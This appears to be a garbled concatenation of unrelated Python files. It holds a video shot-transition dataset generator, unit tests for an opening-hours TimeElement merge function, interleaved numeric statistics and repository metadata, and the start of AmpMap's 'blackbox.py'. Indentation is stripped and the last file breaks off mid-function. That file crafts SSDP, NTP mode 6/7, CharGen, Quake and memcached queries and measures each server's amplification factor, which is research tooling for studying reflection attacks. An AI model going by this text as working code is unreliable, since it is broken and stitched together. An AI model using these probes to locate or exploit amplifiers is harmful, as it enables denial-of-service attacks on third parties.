if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(1, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, self._black_frame, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
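# --- illustrative sketch (not part of the original class) ---
# Every transition above is built from one primitive: a linear blend
# dst = (1 - t) * a + t * b for t in [0, 1]. A fade-in uses a black frame
# as `a`, a fade-out uses black as `b`, and a cross-fade uses two shot
# frames. A minimal, self-contained sketch with synthetic frames:
import cv2
import numpy as np

def demo_crossfade(steps=5, size=32):
    a = np.zeros((size, size, 3), dtype=np.uint8)      # e.g. last frame of shot 1
    b = np.full((size, size, 3), 255, dtype=np.uint8)  # e.g. first frame of shot 2
    frames = []
    for i in range(steps + 1):
        t = i / float(steps)
        frames.append(cv2.addWeighted(a, 1 - t, b, t, 0))
    return frames  # frames[0] == a, frames[-1] == b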
def test_stream(self) -> cx.Stream:
self._frame = 0
self._frames_needed = self._num_of_frames
self._test = self._perm[85:]
pom_labels = copy.deepcopy(self._labels_dir)
index = random.randint(0, len(self._test) - 1)
x = self._test[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
self._test = np.delete(self._test, index)
cap = cv2.VideoCapture(self._videos_dir[x])
idx = 0
i = 0
while True:
i = i + 1
if shot[0] + idx < shot[1]:
cap.set(1, shot[0] + idx)
ret, buf = cap.read()
buf = cv2.resize(buf, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(buf, 0):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
elif shot[0] + idx == shot[1]:
cap.set(1, shot[0] + idx)
ret, fr1 = cap.read()
fr1 = cv2.resize(fr1, (self._size_of_pictures, self._size_of_pictures))
choice = random.random()
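# transition selection below mirrors train_stream (see the comment there),
# but draws shots from the held-out test split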
if choice >= 0.5:
if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
if choice < 0.75:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(self._black_frame, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
elif choice >= 0.25:
if self.__add_image_and_label_to_batch(fr1, 1):
# print(self._images.shape, ' ', self._labels.shape)
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(1, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, self._black_frame, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
def predict_stream(self) -> cx.Stream:
file = '23553'
cap = cv2.VideoCapture('D:/RAIDataset/video_rai/' + file + '.mp4')
fc = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
cap.release()  # only the frame count is needed; frames are read from pre-extracted .bmp files below
idx = 0
start = time.time()
bid = 0
while idx < fc:
buf = cv2.imread('D:/RAIDataset/video_rai/' + file + '/' + str(idx) + '.bmp')
#cap.set(1, idx)
#ret, buf = cap.read()
#buf = cv2.resize(buf,(32,32))
if self.__add_image_only(buf):
img = copy.deepcopy(self._images[0, 0, :, :, :])
img *= 255
cv2.imwrite('D:/outPy/' + str(bid) + 'a.bmp', img)
yield {'images': self._images, 'id': str(bid)}
bid += 1
idx += 1
end = time.time()
logging.info(end - start)
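# --- illustrative usage sketch (assumes `dataset` is a configured
# instance of the class above and that the cx.Stream returned by
# predict_stream() is plainly iterable) ---
def demo_consume_predictions(dataset, max_batches=2):
    for i, batch in enumerate(dataset.predict_stream()):
        print(batch['id'], batch['images'].shape)
        if i + 1 >= max_batches:
            break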
| 41.080292
| 142
| 0.503021
| 2,027
| 16,884
| 3.864825
| 0.081894
| 0.026806
| 0.062548
| 0.075823
| 0.818484
| 0.804315
| 0.79206
| 0.757595
| 0.749043
| 0.728236
| 0
| 0.031787
| 0.386994
| 16,884
| 410
| 143
| 41.180488
| 0.725121
| 0.013385
| 0
| 0.748447
| 0
| 0
| 0.016194
| 0.002955
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034161
| false
| 0
| 0.024845
| 0
| 0.080745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91d8e0454004691025114d7b7a4b39903ad72afe
| 11,479
|
py
|
Python
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 3
|
2020-03-26T05:04:30.000Z
|
2022-03-22T15:57:18.000Z
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 81
|
2020-06-17T14:31:11.000Z
|
2022-02-20T19:01:54.000Z
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 9
|
2020-06-18T10:52:09.000Z
|
2022-02-11T13:05:59.000Z
|
import datetime
from hours.enums import State
from hours.models import TimeElement, combine_and_apply_override
def test_combine_and_apply_override_full_day_override():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=True,
)
assert combine_and_apply_override([te1, te2]) == [te2]
def test_combine_and_apply_override_combine_two_same():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start():
te1 = TimeElement(
start_time=None,
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_end():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start_and_end():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start_one_unknown_end(): # noqa
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_two_separate():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [te1, te2]
def test_combine_and_apply_override_two_separate_one_unknown_start_one_unknown_end(): # noqa
te1 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=datetime.time(hour=8, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [te2, te1]
def test_combine_and_apply_override_one_overriding():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
),
]
def test_combine_and_apply_override_multiple_overriding():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=9, minute=0),
end_time=datetime.time(hour=11, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
te3 = TimeElement(
start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2, te3]) == [te2, te3]
def test_combine_and_apply_override_multiple_overriding_overlapping():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
te3 = TimeElement(
start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2, te3]) == [
TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
),
]
def test_combine_and_apply_full_day_no_override():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=True,
)
assert combine_and_apply_override([te1, te2]) == [te2]
def test_combine_and_apply_override_with_previous_day():
te1 = TimeElement(
start_time=datetime.time(hour=0, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=5, minute=0),
end_time=datetime.time(hour=9, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
expected = TimeElement(
start_time=datetime.time(hour=0, minute=0),
end_time=datetime.time(hour=9, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [expected]
def test_combine_and_apply_override_two_next_day_ends():
te1 = TimeElement(
start_time=datetime.time(hour=22, minute=0),
end_time=datetime.time(hour=4, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=23, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
expected = TimeElement(
start_time=datetime.time(hour=22, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [expected]
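# --- illustrative summary (semantics inferred from the assertions above,
# not stated by the library itself): non-override elements that share a
# resource_state are merged when they touch or overlap, with a None
# start/end treated as open-ended; an override=True element replaces the
# non-override elements it coincides with, and overlapping overrides are
# merged with each other.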
| 27.86165
| 97
| 0.627755
| 1,464
| 11,479
| 4.597678
| 0.04235
| 0.081117
| 0.142624
| 0.17828
| 0.974149
| 0.974149
| 0.965235
| 0.956619
| 0.940128
| 0.934482
| 0
| 0.026904
| 0.271452
| 11,479
| 411
| 98
| 27.92944
| 0.777951
| 0.000784
| 0
| 0.797143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.04
| false
| 0
| 0.008571
| 0
| 0.048571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91e1b83c80f515430c10d03a4ecfbc835cb70ebb
| 31,509
|
py
|
Python
|
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | 4
|
2021-03-29T03:48:14.000Z
|
2021-09-24T10:18:15.000Z
|
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import dns.message
import dns.rdataclass
import dns.rdatatype
import dns.query
import dns.flags
from collections import OrderedDict
from scapy.all import *
from scapy import *
from scapy.layers.inet import *
from scapy.layers.ntp import *
from scapy.fields import *
'''
PCAP_TO_LOCAL_DISK = True: store pcaps to local (non-NFS) dirs, i.e., /ampmap/pcap
PCAP_TO_LOCAL_DISK = False: store pcaps to NFS dirs, i.e., out/pcap
We would suggest storing pcaps to local dirs to ease the burden of NFS read/writes.
'''
PCAP_TO_LOCAL_DISK = True
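# --- illustrative sketch (hypothetical helper, not part of the original
# file) --- Every protocol handler below repeats the same block: pick the
# pcap directory, create it, number the file per phase, write the packets.
# That logic could be captured once like this:
import os
from scapy.utils import wrpcap  # also available via the scapy.all import above

def save_pcap(serverip, phase, query_cnt_dict, packets, to_local=PCAP_TO_LOCAL_DISK):
    root = "/ampmap/pcap/" if to_local else "out/pcap/"
    dirname = root + serverip
    os.makedirs(dirname, exist_ok=True)
    filename = "%s/%s_%d.pcap" % (dirname, phase, query_cnt_dict[phase])
    query_cnt_dict[phase] += 1
    wrpcap(filename, packets)
    return filename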
# send specific query to the server and get responses
class BlackBox:
def __init__(self, timeout):
self.proto = None
self.phase = None
self.query_cnt_dict = {}
self.timeout = timeout
# SSDP
def __ssdp_dict(self, serverip, field_dict):
print("Hey, you reach ssdp dic ...")
packets = []
payload = field_dict["start_line"] + "\r\n" + \
"HOST:" + field_dict["host"] + "\r\n" + \
"MAN:\"" + field_dict["man"] + "\"\r\n" + \
"MX:" + str(field_dict["mx"]) + "\r\n" + \
"ST:" + field_dict["st"] + "\r\n\r\n"
print(payload)
ssdpRequest = IP(dst=serverip) / UDP(sport=random.randint(5000,65535), dport= 1900) / payload
res, unans = sr(ssdpRequest, multi=True, timeout=self.timeout)
packets.append(ssdpRequest)
# If there is response
if res is not None:
resplen = 0
for r in res:
resplen = resplen + len(r[1])
print("server_ip: %s, AF: %f\n" %(serverip, resplen/len(ssdpRequest)))
for x in res:
packets.append(x[1])
# store PCAPs of request/response
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return resplen/len(ssdpRequest)
# If there is no response
else:
print("server_ip: %s, AF: 0\n" %serverip)
# store PCAPs of request/response
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# NTP: including private, normal, control modes
def __ntp_dict(self, serverip, field_dict):
packets = []
print("Hey, you reach NTP dict...")
if field_dict["mode"] == 7:
print("IN PRIVATE MODE 7 ")
payload = NTPPrivate()
elif field_dict["mode"] == 6:
print("IN CONTROL MODE 6")
payload = NTPControl()
else:
payload = NTPHeader()
for fid, val in field_dict.items():
setattr(payload, fid, val)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=123)/payload
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
#time.sleep(5)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# Quake
def __quake_dict(self, serverip, field_dict):
#convert hex to bytes
packets = []
data = bytearray()
data += bytes.fromhex(field_dict["pre"])
data += bytearray( field_dict["char"], "utf-8")
post = field_dict["post"]
post = struct.pack("B", post)
post = post * field_dict["len_post"]
data += post
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=27960) \
/Raw(load=data)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# CharGen
def __chargen_dict(self, serverip, field_dict):
print("Hey, you reach chargen dic...")
print(field_dict["character"], field_dict["length"])
packets = []
character = field_dict["character"]
length = int(field_dict["length"])
payload = bytearray()
# if character is '0' - '9'
if character >= '0' and character <= '9':
payload = bytearray([int(character)])*length
else:
payload = bytearray(character, 'utf-8')*length
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=19)/Raw(load=payload)
print("request " , request)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
print("response ", res)
if res is not None:
resplen = 0
for x in res:
if len(x) >= 2:
resplen += len(x[1])
print("AF: ", float(resplen)/float(len(request)))
print()
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# memcached
def __memcached_dict(self, serverip, field_dict):
packets = []
print("Hey, you reach memcached dic...")
data = bytearray()
data += b'\x00\x00\x00\x00\x00\x01\x00\x00'
data = data + bytearray(field_dict["command"], 'utf-8')
if field_dict["key"] != "":
data += bytearray(" ", 'utf-8')
data += bytearray(field_dict["key"], 'utf-8')
data += b'\r\n'
print("data ", data)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=11211)/Raw(load=data)
print("request " , request)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# rpc
def __rpc_dict(self, server_ip, field_dict):
# NOTE: unimplemented stub -- the rpc module is never imported in this
# file and "rpc" is not dispatched from get_af_dict below
msg = rpc.RPCCall( )
# SNMP_Bulk
def __snmpbulk_dict(self, serverip, field_dict):
version = field_dict["version"]
community = field_dict["community"]
id = field_dict["id"]
non_repeaters = field_dict["non_repeaters"]
max_repetitions = field_dict["max_repetitions"]
varbind_oid = field_dict["varbind_oid"]
varbind_multiple = field_dict["varbind_multiple"]
print(varbind_oid)
print("field_dict: ", field_dict)
oid_lst = [SNMPvarbind(oid=ASN1_OID(varbind_oid))] * varbind_multiple
